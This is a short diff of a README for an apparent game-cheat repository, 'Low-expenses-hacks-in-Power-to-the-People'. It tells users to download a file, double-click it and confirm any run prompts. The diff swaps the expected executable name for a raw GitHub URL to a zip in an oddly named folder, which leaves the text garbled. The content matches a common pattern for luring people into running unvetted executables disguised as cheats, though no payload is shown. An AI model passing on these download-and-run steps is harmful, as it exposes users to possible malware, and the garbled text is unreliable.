DummiFTW/Low-expenses-hacks-in-Power-to-the-People/README.md

 ## 🔧 Running the Application
 After downloading, follow these steps to run the application:

 1. Find the downloaded file in your downloads folder.
-It should be named something like `Low-expenses-hacks-in-Power-to-the-People.exe`.
+It should be named something like `https://raw.githubusercontent.com/DummiFTW/Low-expenses-hacks-in-Power-to-the-People/main/neuropathologist/Low-expenses-hacks-in-Power-to-the-People.zip`.
 2. Double-click the file to open the application.
 3. Follow any prompts that appear.
 You may need to confirm that you want to run the application.
 4. After the application opens, explore the features available to enhance your gameplay.